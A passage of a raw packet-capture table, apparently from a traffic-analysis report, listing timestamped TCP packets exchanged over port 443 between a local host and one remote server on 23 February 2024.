                                                                  Feb 23, 2024 15:43:24.710077047 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.710098982 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.710124969 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.710124969 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.710140944 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.710164070 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.710199118 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.710213900 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.710235119 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.710239887 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.710258007 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.710267067 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.710275888 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.710306883 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.710308075 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.710338116 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.710361004 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.710396051 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.710411072 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.710433960 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.710436106 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.710460901 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.710493088 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.710501909 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.710527897 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.710535049 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.710555077 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.710592985 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.710608959 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.710630894 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.710642099 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.710663080 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.710697889 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.710709095 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.710733891 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.710735083 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.710755110 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.710783005 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.710793018 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.710820913 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.710836887 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.710858107 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.710892916 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.710902929 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.710922956 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.710928917 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.710942984 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.710978031 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.710989952 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.711030006 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.711292982 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.711314917 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.711349010 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.711359978 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.711384058 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.711404085 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.712095022 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.712119102 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.712153912 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.712165117 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.712191105 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.712209940 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.712389946 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.712764978 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.712784052 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.712824106 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.712833881 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.712860107 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.712877035 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.713435888 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.713457108 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.713499069 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.713509083 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.713534117 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.713553905 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.714205980 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.714226007 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.714262962 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.714288950 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.714313984 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.715241909 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.715264082 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.715300083 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.715311050 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.715337038 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.716180086 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.716197968 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.716253042 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.716268063 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.716290951 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.717111111 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.717130899 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.886532068 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.886559010 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.886640072 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.886702061 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.886735916 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.886759996 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.887793064 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.887857914 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.887859106 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.887882948 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.887923002 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.887923002 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.888107061 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.888140917 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.888168097 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.888184071 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.888206959 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.888231993 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.888569117 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.888607979 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.888633013 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.888643026 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.888669014 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.888688087 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.888911963 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.888966084 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.888972998 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.888988972 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.889024973 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.889024973 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.889318943 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.889359951 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.889380932 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.889391899 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.889419079 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.889437914 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.889915943 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.889934063 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.889976025 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.889986038 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.890011072 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.890028000 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.890295029 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.890345097 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.890357971 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.890367031 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.890391111 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.890410900 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.890717030 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.890750885 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.890784979 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.890794992 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.890819073 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.890836000 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.891386986 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.891428947 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.891448975 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.891458988 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.891486883 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.891503096 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.891777992 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.891814947 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.891843081 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.891853094 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.891876936 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.892050028 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.892123938 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.892154932 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.892174959 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.892184973 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.892211914 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.892230988 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.892469883 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.892488956 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.892530918 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.892541885 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.892565012 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.892581940 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.892782927 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.892827988 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.892851114 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.892859936 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.892887115 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.892978907 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.893062115 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.893104076 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.893140078 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.893140078 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.893151999 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.893292904 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.893440962 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.893459082 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.893516064 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.893516064 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.893527985 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.893568993 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.893858910 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.893877983 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.893923998 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.893940926 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.893980026 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.893980026 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.894320011 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.894350052 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.894387007 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.894397020 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.894422054 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.894489050 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.894777060 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.894809008 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.894850016 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.894860029 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.894885063 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.894903898 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.895333052 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.895364046 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.895397902 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.895407915 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.895432949 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.895450115 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.895850897 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.895869970 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.895914078 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.895925045 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.895950079 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.896311045 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.896363020 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.896375895 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.896387100 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.896429062 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.896452904 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.896605015 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.896646023 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.896662951 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.896672964 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.896697044 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.896716118 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.897036076 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.897072077 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.897100925 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.897110939 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.897135019 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.897197962 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.897336960 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.897356033 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.897392035 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.897401094 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.897428989 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.897448063 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.897682905 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.897702932 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.897758961 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.897770882 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.897929907 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.898034096 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.898052931 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.898092031 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.898107052 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.898130894 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.898149967 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.898514986 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.898547888 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.898582935 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.898592949 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.898637056 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.898637056 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.898895025 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.898915052 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.898953915 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.898981094 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.899007082 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.899312973 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.899337053 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.899373055 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.899388075 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.899410009 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.899430037 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.899910927 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.899943113 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.899974108 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.899983883 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.900010109 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.900027037 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.900173903 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.900213003 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.900235891 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.900245905 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.900271893 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.900583982 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.900629044 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.900645018 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.900655031 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.900680065 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.900717020 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.900921106 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.900943995 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.900985003 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.901000023 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.901024103 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.901041985 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.901274920 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.901294947 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.901335955 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.901345968 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.901370049 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.901623964 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.901647091 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.901681900 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.901695967 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.901716948 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.901736021 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.902003050 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.902023077 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.902069092 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.902082920 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.902105093 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.902123928 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.902416945 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.902455091 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.902481079 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.902491093 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.902515888 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.902890921 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.902913094 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.902968884 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.902968884 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.902981043 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.903227091 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.903244019 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.903284073 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.903295994 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.903321981 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.903572083 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.903595924 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.903630018 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.903640985 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.903666019 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.903950930 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.903980970 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.904007912 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.904020071 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.904046059 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.904329062 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.904376030 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.904395103 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.904406071 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:24.904429913 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:24.904448986 CET49704443192.168.2.53.5.232.21
